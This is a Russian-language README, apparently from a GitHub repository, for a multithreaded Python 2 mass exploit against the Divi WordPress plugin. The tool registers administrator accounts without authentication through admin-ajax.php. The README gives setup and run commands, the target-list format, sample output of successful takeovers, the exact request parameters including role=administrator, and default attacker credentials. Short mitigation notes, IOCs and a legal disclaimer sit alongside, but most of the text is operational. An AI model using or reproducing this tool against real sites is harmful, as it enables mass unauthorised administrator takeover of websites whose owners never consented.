
CVE-2026-5118 – массовый эксплойт на Python2 для плагина Divi WordPress Неавторизованная регистрация администратора через admin-ajax.php. Многопоточный сканер с извлечением nonce.
⚠️ ПРЕДУПРЕЖДЕНИЕ: Этот инструмент предназначен только для авторизованного тестирования на проникновение и исследований безопасности.
Несанкционированный доступ к компьютерным системам незаконен. Используйте только на системах, которыми вы владеете или на тестирование которых имеете явное письменное разрешение. Более подробное заявление об отказе от ответственности можно увидеть в репозитории Jenderal92. Вы можете проверить его ЗДЕСЬ !!!
Этот скрипт на Python 2 эксплуатирует уязвимость повышения привилегий в плагине Divi WordPress (и связанных формах Divi). Он позволяет удаленно зарегистрировать учетную запись администратора путем:
fb_nonce из формы регистрации Divi на цели./wp-admin/admin-ajax.php с role=administrator.https://, если отсутствует.de_fb_obj).success, user_id, user created и т.д.).results.txt в формате:https://target.com/wp-admin/ | username | passwordurllib2, Queue, threading – несовместим с Python 3 без изменений)git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py
Создайте текстовый файл с одним доменом или URL на строку. Вы можете опустить http:// / https:// – скрипт добавит https:// по умолчанию.
Пример targets.txt:
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org
python CVE-2026-5118.py targets.txt
[*] Total targets : 4
[*] Credentials : Attacker / Attacker@123#+
[*] Threads : 20
[*] Output file : results.txt
[1] Checking https://example.com
[+] SUCCESS! https://example.com/wp-admin/
[2] Checking https://vulnerable-site.com
[+] SUCCESS! https://vulnerable-site.com/wp-admin/
[3] Checking http://192.168.1.100/wordpress
[3] FAILED http://192.168.1.100/wordpress
[4] Checking https://test-site.org
[4] FAILED https://test-site.org
=== DONE ===
Successful: 2 / 4
results.txt)https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+
Вы можете настроить следующие переменные в начале скрипта:
https://, если схема не указана.fb_nonce с помощью шаблонов regex.multipart/form-data, содержащий:
action=de_fb_ajax_submit_ajax_handlerfb_nonce=<extracted nonce>role=administratorde_fb_user_login / user_loginde_fb_user_pass / user_passde_fb_user_email / user_emailДля администраторов WordPress, использующих Divi:
admin-ajax.php.role, которым можно манипулировать.Индикаторы компрометации (IOCs):
admin-ajax.php с action=de_fb_ajax_submit_ajax_handlerAttacker)role=administrator, в журналах доступаЭто программное обеспечение предоставляется только для образовательных целей и авторизованного тестирования безопасности. Автор не несет ответственности за неправомерное использование или ущерб, причиненный этим инструментом. Используя это программное обеспечение, вы соглашаетесь:
Нарушение этих условий может привести к уголовному преследованию, штрафам или тюремному заключению.
Принимаются запросы на включение изменений для улучшений (портирование на Python 3, лучшее извлечение nonce, обнаружение дополнительных путей регистрации). Пожалуйста, сохраняйте этическое заявление об отказе от ответственности.
| Переменная | По умолчанию | Описание |
|---|
DEFAULT_USERNAME | Attacker | Имя пользователя для регистрации |
DEFAULT_PASSWORD | Attacker@123#+ | Пароль (надежный, со спецсимволами) |
DEFAULT_EMAIL | [email protected] | Адрес электронной почты |
THREAD_COUNT | 20 | Количество одновременных потоков |
OUTPUT_FILE | results.txt | Файл для сохранения успешных целей |